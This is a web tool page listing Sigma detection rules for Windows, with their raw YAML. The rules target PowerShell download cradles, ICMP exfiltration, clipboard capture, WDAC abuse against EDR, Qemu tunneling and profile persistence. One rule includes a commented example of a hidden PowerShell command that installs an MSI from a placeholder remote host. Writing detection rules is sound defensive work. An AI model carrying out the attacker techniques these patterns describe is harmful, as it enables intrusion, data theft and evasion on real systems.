Tool
SIEM
Sigma (generic) detection rules
1,492 rules indexed · SIEM-agnostic detection content
Sigma is the open generic signature format for SIEM systems. Expand any rule to see its raw YAML and convert it inline to native query syntax. Pick a platform above to browse every rule already rendered in that language.
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
◈
Detection rules
50 shown of 1,492
medium
Potentially Suspicious Usage Of Qemu
Detects potentially suspicious execution of the Qemu utility in a Windows environment.
Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
view Sigma YAML
title: Potentially Suspicious Usage Of Qemu
id: 5fc297ae-25b6-488a-8f25-cc12ac29b744
status: test
description: |
Detects potentially suspicious execution of the Qemu utility in a Windows environment.
Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
references:
- https://securelist.com/network-tunneling-with-qemu/111803/
- https://www.qemu.org/docs/master/system/invocation.html#hxtool-5
author: Muhammad Faisal (@faisalusuf), Hunter Juhan (@threatHNTR)
date: 2024-06-03
tags:
- attack.command-and-control
- attack.t1090
- attack.t1572
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- '-m 1M' # VM with just 1MB of ram is insufficient this is a suspicious flag
- '-m 2M'
- '-m 3M'
CommandLine|contains|all:
- 'restrict=off'
- '-netdev '
- 'connect='
- '-nographic' # This is also a key detection no one invoke without UI from console usually its a flag.
filter_main_normal_usecase:
CommandLine|contains:
- ' -cdrom ' # Normal usage cases
- ' type=virt '
- ' -blockdev '
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load
Detects the image load of VSS DLL by uncommon executables
view Sigma YAML
title: Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load
id: 48bfd177-7cf2-412b-ad77-baf923489e82
related:
- id: 333cdbe8-27bb-4246-bf82-b41a0dca4b70 # vss_ps.dll
type: similar
- id: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 # vssapi.dll
type: similar
status: test
description: Detects the image load of VSS DLL by uncommon executables
references:
- https://github.com/ORCx41/DeleteShadowCopies
author: frack113
date: 2023-02-17
modified: 2025-12-03
tags:
- attack.impact
- attack.t1490
logsource:
category: image_load
product: windows
detection:
selection:
ImageLoaded|endswith: '\vsstrace.dll'
filter_main_windows:
- Image:
- 'C:\Windows\explorer.exe'
- 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe'
- Image|startswith:
- 'C:\Windows\System32\'
- 'C:\Windows\SysWOW64\'
- 'C:\Windows\Temp\{' # Installers
- 'C:\Windows\WinSxS\'
- 'C:\ProgramData\Package Cache\{' # Microsoft Visual Redistributable installer VC_redist/vcredist EXE
filter_main_program_files:
# When using this rule in your environment replace the "Program Files" folder by the exact applications you know use this. Examples would be software such as backup solutions
Image|startswith:
- 'C:\Program Files\'
- 'C:\Program Files (x86)\'
filter_optional_recovery:
Image|startswith: 'C:\$WinREAgent\Scratch\'
filter_main_null_image:
Image: null # Observed through Aurora
filter_optional_avira:
Image|contains|all:
- '\temp\is-'
- '\avira_system_speedup.tmp'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Potentially Suspicious WDAC Policy File Creation
Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system.
view Sigma YAML
title: Potentially Suspicious WDAC Policy File Creation
id: 1d2de8a6-4803-4fde-b85b-f58f3aa7a705
status: experimental
description: |
Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system.
references:
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-using-group-policy
- https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/
- https://github.com/logangoins/Krueger/tree/main
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/appcontrol-deployment-guide
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-script
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-memcm
author: X__Junior
date: 2025-02-07
modified: 2026-05-18
tags:
- attack.defense-impairment
logsource:
category: file_event
product: windows
detection:
selection_target:
# This is a default location but unfortunately it could be any path configured in Group Policy Management Editor.
# No file extension needed because any extension would work, check first reference.
TargetFilename|contains: '\Windows\System32\CodeIntegrity\'
filter_main_images:
Image|endswith:
- '\Microsoft.ConfigurationManagement.exe' # Replace with full path to avoid false negatives
- '\WDAC Wizard.exe' # Replace with full path to avoid false negatives
- 'C:\Program Files\PowerShell\7-preview\pwsh.exe'
- 'C:\Program Files\PowerShell\7\pwsh.exe'
- 'C:\Windows\System32\dllhost.exe'
- 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe'
- 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
- 'C:\Windows\SysWOW64\dllhost.exe'
- 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe'
- 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
filter_main_cli:
- CommandLine|contains|all:
- 'ConvertFrom-CIPolicy -XmlFilePath'
- '-BinaryFilePath '
- CommandLine|contains: 'CiTool --update-policy'
- CommandLine|contains|all:
- 'Copy-Item -Path'
- '-Destination'
filter_main_system:
Image: 'System'
filter_main_wuauclt:
Image: 'C:\Windows\System32\wuauclt.exe'
filter_main_wuaucltcore:
Image:
- 'C:\Windows\UUS\arm64\wuaucltcore.exe'
- 'C:\Windows\UUS\Packages\Preview\arm64\wuaucltcore.exe'
condition: selection_target and not 1 of filter_main_*
falsepositives:
- Administrators and security vendors could leverage WDAC, apply additional filters as needed.
level: medium
Convert to SIEM query
medium
Potentially Suspicious WebDAV LNK Execution
Detects possible execution via LNK file accessed on a WebDAV server.
view Sigma YAML
title: Potentially Suspicious WebDAV LNK Execution
id: 1412aa78-a24c-4abd-83df-767dfb2c5bbe
related:
- id: f0507c0f-a3a2-40f5-acc6-7f543c334993
type: similar
status: test
description: Detects possible execution via LNK file accessed on a WebDAV server.
references:
- https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html
- https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462
author: Micah Babinski
date: 2023-08-21
tags:
- attack.execution
- attack.t1059.001
- attack.t1204
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\explorer.exe'
Image|endswith:
- '\cmd.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\wscript.exe'
CommandLine|contains: '\DavWWWRoot\'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Potentially Suspicious Windows App Activity
Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution
view Sigma YAML
title: Potentially Suspicious Windows App Activity
id: f91ed517-a6ba-471d-9910-b3b4a398c0f3
status: test
description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution
references:
- https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
- https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-12
modified: 2025-10-07
tags:
- attack.stealth
logsource:
product: windows
category: process_creation
detection:
selection_parent:
# GrandParentImage|endswith: '\sihost.exe'
ParentImage|contains: 'C:\Program Files\WindowsApps\'
selection_susp_img:
Image|endswith:
# You can add more LOLBINs
- '\cmd.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\powershell.exe'
- '\powershell_ise.exe'
- '\pwsh.exe'
- '\regsvr32.exe'
- '\rundll32.exe'
- '\wscript.exe'
selection_susp_cli:
# You can add more potentially suspicious keywords
CommandLine|contains:
- 'cmd /c'
- 'Invoke-'
- 'Base64'
filter_optional_terminal:
ParentImage|contains: ':\Program Files\WindowsApps\Microsoft.WindowsTerminal'
ParentImage|endswith: '\WindowsTerminal.exe'
# Note: to avoid FP add the default shells and profiles that your WT integrates
Image|endswith:
- '\powershell.exe'
- '\cmd.exe'
- '\pwsh.exe'
filter_optional_sysinternals:
ParentImage|startswith: 'C:\Program Files\WindowsApps\Microsoft.SysinternalsSuite'
Image|endswith: '\cmd.exe'
condition: selection_parent and 1 of selection_susp_* and not 1 of filter_optional_*
falsepositives:
- Legitimate packages that make use of external binaries such as Windows Terminal
level: medium
Convert to SIEM query
medium
Potentially Suspicious Wuauclt Network Connection
Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections.
One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
view Sigma YAML
title: Potentially Suspicious Wuauclt Network Connection
id: c649a6c7-cd8c-4a78-9c04-000fc76df954
status: test
description: |
Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections.
One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
references:
- https://dtm.uk/wuauclt/
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-10-12
modified: 2024-03-12
tags:
- attack.stealth
- attack.t1218
logsource:
category: network_connection
product: windows
definition: 'Requirements: The CommandLine field enrichment is required in order for this rule to be used.'
detection:
selection:
Image|contains: 'wuauclt'
CommandLine|contains: ' /RunHandlerComServer'
# "C:\WINDOWS\uus\AMD64\wuauclt.exe" /DeploymentHandlerFullPath \\?\C:\Windows\UUS\AMD64\UpdateDeploy.dll /ClassId aaa256e1-5b21-4993-9188-18f07ccb3b98 /RunHandlerComServer
filter_main_ip:
DestinationIp|cidr: # Ranges excluded based on https://github.com/SigmaHQ/sigma/blob/0f176092326ab9d1e19384d30224e5f29f760d82/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml
- '127.0.0.0/8'
- '10.0.0.0/8'
- '169.254.0.0/16' # link-local address
- '172.16.0.0/12'
- '192.168.0.0/16'
- '::1/128' # IPv6 loopback
- 'fe80::/10' # IPv6 link-local addresses
- 'fc00::/7' # IPv6 private addresses
filter_main_msrange: # Sysmon
DestinationIp|cidr:
- '20.184.0.0/13' # Microsoft Corporation
- '20.192.0.0/10' # Microsoft Corporation
- '23.79.0.0/16' # Microsoft Corporation
- '51.10.0.0/15'
- '51.103.0.0/16' # Microsoft Corporation
- '51.104.0.0/15' # Microsoft Corporation
- '52.224.0.0/11' # Microsoft Corporation
filter_main_uus:
CommandLine|contains:
- ':\Windows\UUS\Packages\Preview\amd64\updatedeploy.dll /ClassId'
- ':\Windows\UUS\amd64\UpdateDeploy.dll /ClassId'
filter_main_winsxs:
CommandLine|contains|all:
- ':\Windows\WinSxS\'
- '\UpdateDeploy.dll /ClassId '
filter_main_cli_null:
CommandLine: null
filter_main_cli_empty:
CommandLine: ''
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
PowerShell Console History Logs Deleted
Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence
view Sigma YAML
title: PowerShell Console History Logs Deleted
id: ff301988-c231-4bd0-834c-ac9d73b86586
status: test
description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-15
tags:
- attack.stealth
- attack.t1070
logsource:
category: file_delete
product: windows
detection:
selection:
TargetFilename|endswith: '\PSReadLine\ConsoleHost_history.txt'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
PowerShell Core DLL Loaded By Non PowerShell Process
Detects loading of essential DLLs used by PowerShell by non-PowerShell process.
Detects behavior similar to meterpreter's "load powershell" extension.
view Sigma YAML
title: PowerShell Core DLL Loaded By Non PowerShell Process
id: 092bc4b9-3d1d-43b4-a6b4-8c8acd83522f
related:
- id: 867613fb-fa60-4497-a017-a82df74a172c
type: obsolete
- id: fe6e002f-f244-4278-9263-20e4b593827f
type: obsolete
status: test
description: |
Detects loading of essential DLLs used by PowerShell by non-PowerShell process.
Detects behavior similar to meterpreter's "load powershell" extension.
references:
- https://adsecurity.org/?p=2921
- https://github.com/p3nt4/PowerShdll
author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2019-11-14
modified: 2025-10-07
tags:
- attack.t1059.001
- attack.execution
logsource:
category: image_load
product: windows
detection:
selection:
- Description: 'System.Management.Automation'
- OriginalFileName: 'System.Management.Automation.dll'
- ImageLoaded|endswith:
- '\System.Management.Automation.dll'
- '\System.Management.Automation.ni.dll'
filter_main_powershell:
Image:
- 'C:\Program Files\PowerShell\7-preview\pwsh.exe' # PowerShell 7 preview
- 'C:\Program Files\PowerShell\7\pwsh.exe' # PowerShell 7
- 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe'
- 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
- 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe'
- 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
filter_main_pwsh_preview:
Image|contains:
- 'C:\Program Files\WindowsApps\Microsoft.PowerShellPreview'
- '\AppData\Local\Microsoft\WindowsApps\Microsoft.PowerShellPreview'
Image|endswith: '\pwsh.exe'
filter_main_generic:
Image:
- 'C:\Windows\System32\dsac.exe'
- 'C:\WINDOWS\System32\RemoteFXvGPUDisablement.exe'
- 'C:\Windows\System32\runscripthelper.exe'
- 'C:\WINDOWS\System32\sdiagnhost.exe'
- 'C:\Windows\System32\ServerManager.exe'
- 'C:\Windows\System32\SyncAppvPublishingServer.exe'
- 'C:\Windows\System32\winrshost.exe'
- 'C:\Windows\System32\wsmprovhost.exe'
- 'C:\Windows\SysWOW64\winrshost.exe'
- 'C:\Windows\SysWOW64\wsmprovhost.exe'
filter_main_dotnet:
Image|startswith:
- 'C:\Windows\Microsoft.NET\Framework\'
- 'C:\Windows\Microsoft.NET\FrameworkArm\'
- 'C:\Windows\Microsoft.NET\FrameworkArm64\'
- 'C:\Windows\Microsoft.NET\Framework64\'
Image|endswith: '\mscorsvw.exe'
filter_optional_sql_server_mgmt:
Image|startswith:
- 'C:\Program Files (x86)\Microsoft SQL Server Management Studio'
- 'C:\Program Files\Microsoft SQL Server Management Studio'
Image|endswith: '\IDE\Ssms.exe'
filter_optional_sql_server_tools:
Image|startswith:
- 'C:\Program Files (x86)\Microsoft SQL Server\'
- 'C:\Program Files\Microsoft SQL Server\'
Image|endswith: '\Tools\Binn\SQLPS.exe'
filter_optional_citrix:
Image|endswith: '\Citrix\ConfigSync\ConfigSyncRun.exe'
filter_optional_vs:
Image|startswith:
- 'C:\Program Files (x86)\Microsoft Visual Studio\'
- 'C:\Program Files\Microsoft Visual Studio\'
filter_optional_chocolatey:
Image|startswith: 'C:\ProgramData\chocolatey\choco.exe'
filter_optional_nextron:
Image|startswith: 'C:\Windows\Temp\asgard2-agent\'
Image|endswith:
- '\thor64.exe'
- '\thor.exe'
# User: 'NT AUTHORITY\SYSTEM' # if set, matches all powershell processes not launched by SYSTEM
filter_optional_aurora:
# This filter is to avoid a race condition FP with this specific ETW provider in aurora
Image: null
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Used by some .NET binaries, minimal on user workstation.
- Used by Microsoft SQL Server Management Studio
level: medium
Convert to SIEM query
medium
PowerShell Core DLL Loaded Via Office Application
Detects PowerShell core DLL being loaded by an Office Product
view Sigma YAML
title: PowerShell Core DLL Loaded Via Office Application
id: bb2ba6fb-95d4-4a25-89fc-30bb736c021a
status: test
description: Detects PowerShell core DLL being loaded by an Office Product
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-01
tags:
- attack.stealth
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith:
- '\excel.exe'
- '\mspub.exe'
- '\outlook.exe'
- '\onenote.exe'
- '\onenoteim.exe' # Just in case
- '\powerpnt.exe'
- '\winword.exe'
ImageLoaded|contains:
- '\System.Management.Automation.Dll'
- '\System.Management.Automation.ni.Dll'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
PowerShell Create Local User
Detects creation of a local user via PowerShell
view Sigma YAML
title: PowerShell Create Local User
id: 243de76f-4725-4f2e-8225-a8a69b15ad61
status: test
description: Detects creation of a local user via PowerShell
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md
author: '@ROxPinTeddy'
date: 2020-04-11
modified: 2022-12-25
tags:
- attack.execution
- attack.t1059.001
- attack.persistence
- attack.t1136.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains: 'New-LocalUser'
condition: selection
falsepositives:
- Legitimate user creation
level: medium
Convert to SIEM query
medium
PowerShell Deleted Mounted Share
Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
view Sigma YAML
title: PowerShell Deleted Mounted Share
id: 66a4d409-451b-4151-94f4-a55d559c49b0
status: test
description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md
author: 'oscd.community, @redcanary, Zach Stanford @svch0st'
date: 2020-10-08
modified: 2025-10-07
tags:
- attack.stealth
- attack.t1070.005
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains:
- 'Remove-SmbShare'
- 'Remove-FileShare'
filter_main_module_load:
ScriptBlockText|contains|all:
- 'FileShare.cdxml'
- 'Microsoft.PowerShell.Core\Export-ModuleMember'
- 'ROOT/Microsoft/Windows/Storage/MSFT_FileShare'
- 'ObjectModelWrapper'
- 'Cmdletization.MethodParameter'
condition: selection and not 1 of filter_main_*
falsepositives:
- Administrators or Power users may remove their shares via cmd line
level: medium
Convert to SIEM query
medium
PowerShell Downgrade Attack - PowerShell
Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
view Sigma YAML
title: PowerShell Downgrade Attack - PowerShell
id: 6331d09b-4785-4c13-980f-f96661356249
status: test
description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
references:
- http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
author: Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)
date: 2017-03-22
modified: 2023-10-27
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_classic_start
detection:
selection:
Data|contains: 'EngineVersion=2.'
filter_main:
Data|contains: 'HostVersion=2.'
condition: selection and not filter_main
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
PowerShell Download Pattern
Detects a Powershell process that contains download commands in its command line string
view Sigma YAML
title: PowerShell Download Pattern
id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
related:
- id: e6c54d94-498c-4562-a37c-b469d8e9a275
type: derived
- id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5
type: obsolete
status: test
description: Detects a Powershell process that contains download commands in its command line string
references:
- https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html
- https://lab52.io/blog/winter-vivern-all-summer/
- https://hatching.io/blog/powershell-analysis/
author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
date: 2019-01-16
modified: 2025-10-20
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\powershell_ise.exe'
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell_ISE.EXE'
- 'PowerShell.EXE'
- 'pwsh.dll'
selection_cli:
CommandLine|contains|all:
- 'new-object'
- 'net.webclient).'
- 'download'
CommandLine|contains:
- 'string('
- 'file('
condition: all of selection_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
PowerShell Get Clipboard
A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.
view Sigma YAML
title: PowerShell Get Clipboard
id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78
status: test
description: A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.
references:
- https://github.com/OTRF/detection-hackathon-apt29/issues/16
- https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-05-02
modified: 2023-01-04
tags:
- attack.collection
- attack.t1115
logsource:
product: windows
category: ps_module
definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b
detection:
selection:
Payload|contains: 'Get-Clipboard'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
PowerShell Get-Clipboard Cmdlet Via CLI
Detects usage of the 'Get-Clipboard' cmdlet via CLI
view Sigma YAML
title: PowerShell Get-Clipboard Cmdlet Via CLI
id: b9aeac14-2ffd-4ad3-b967-1354a4e628c3
related:
- id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78
type: derived
status: test
description: Detects usage of the 'Get-Clipboard' cmdlet via CLI
references:
- https://github.com/OTRF/detection-hackathon-apt29/issues/16
- https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md
author: Nasreddine Bencherchali (Nextron Systems)
date: 2020-05-02
modified: 2022-12-25
tags:
- attack.collection
- attack.t1115
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains: 'Get-Clipboard'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
PowerShell Hotfix Enumeration
Detects call to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes often used in "enum" scripts by attackers
view Sigma YAML
title: PowerShell Hotfix Enumeration
id: f5d1def8-1de0-4a0e-9794-1f6f27dd605c
status: test
description: Detects call to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes often used in "enum" scripts by attackers
references:
- https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-21
tags:
- attack.discovery
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'Win32_QuickFixEngineering'
- 'HotFixID'
condition: selection
falsepositives:
- Legitimate administration scripts
level: medium
Convert to SIEM query
medium
PowerShell ICMP Exfiltration
Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
view Sigma YAML
title: PowerShell ICMP Exfiltration
id: 4c4af3cd-2115-479c-8193-6b8bfce9001c
status: test
description: Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp
author: 'Bartlomiej Czyz @bczyz1, oscd.community'
date: 2020-10-10
modified: 2022-12-25
tags:
- attack.exfiltration
- attack.t1048.003
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'New-Object'
- 'System.Net.NetworkInformation.Ping'
- '.Send('
condition: selection
falsepositives:
- Legitimate usage of System.Net.NetworkInformation.Ping class
level: medium
Convert to SIEM query
medium
PowerShell MSI Install via WindowsInstaller COM From Remote Location
Detects the execution of PowerShell commands that attempt to install MSI packages via the
Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely.
This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality.
And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.
view Sigma YAML
title: PowerShell MSI Install via WindowsInstaller COM From Remote Location
id: 222720a7-047f-4054-baa5-bab9be757db0
status: experimental
description: |
Detects the execution of PowerShell commands that attempt to install MSI packages via the
Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely.
This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality.
And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.
references:
- https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/
- https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/
- https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457
author: Meroujan Antonyan (vx3r)
date: 2025-06-05
tags:
- attack.execution
- attack.stealth
- attack.t1059.001
- attack.t1218
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
# Example: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='https://example.com/';$i=New-Object -ComObject('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct($u),'')";
selection_img:
- Image|endswith:
- '\powershell_ise.exe'
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell_ISE.EXE'
- 'PowerShell.EXE'
- 'pwsh.dll'
selection_cli:
CommandLine|contains|all:
- '-ComObject'
- 'InstallProduct('
selection_remote:
CommandLine|contains:
- 'http'
- '\\\\'
filter_main_localhost:
CommandLine|contains:
- '://127.0.0.1'
- '://localhost'
condition: all of selection_* and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
PowerShell Module File Created By Non-PowerShell Process
Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
view Sigma YAML
title: PowerShell Module File Created By Non-PowerShell Process
id: e3845023-ca9a-4024-b2b2-5422156d5527
status: test
description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
references:
- Internal Research
- https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-09
modified: 2025-10-07
tags:
- attack.persistence
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|contains:
- '\WindowsPowerShell\Modules\'
- '\PowerShell\7\Modules\'
filter_main_pwsh:
Image|endswith:
- ':\Program Files\PowerShell\7-preview\pwsh.exe'
- ':\Program Files\PowerShell\7\pwsh.exe'
- ':\Windows\System32\poqexec.exe' # https://github.com/SigmaHQ/sigma/issues/4448
- ':\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe'
- ':\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
- ':\Windows\SysWOW64\poqexec.exe' # https://github.com/SigmaHQ/sigma/issues/4448
- ':\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe'
- ':\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
filter_main_msiexec:
Image:
- 'C:\Windows\System32\msiexec.exe'
- 'C:\Windows\SysWOW64\msiexec.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
PowerShell Profile Modification
Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
view Sigma YAML
title: PowerShell Profile Modification
id: b5b78988-486d-4a80-b991-930eff3ff8bf
status: test
description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
references:
- https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
- https://persistence-info.github.io/Data/powershellprofile.html
author: HieuTT35, Nasreddine Bencherchali (Nextron Systems)
date: 2019-10-24
modified: 2023-10-23
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1546.013
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|endswith:
- '\Microsoft.PowerShell_profile.ps1'
- '\PowerShell\profile.ps1'
- '\Program Files\PowerShell\7-preview\profile.ps1'
- '\Program Files\PowerShell\7\profile.ps1'
- '\Windows\System32\WindowsPowerShell\v1.0\profile.ps1'
- '\WindowsPowerShell\profile.ps1'
condition: selection
falsepositives:
- System administrator creating Powershell profile manually
level: medium
Convert to SIEM query
medium
PowerShell Remote Session Creation
Adversaries may abuse PowerShell commands and scripts for execution.
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system
view Sigma YAML
title: PowerShell Remote Session Creation
id: a0edd39f-a0c6-4c17-8141-261f958e8d8f
status: test
description: |
Adversaries may abuse PowerShell commands and scripts for execution.
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle
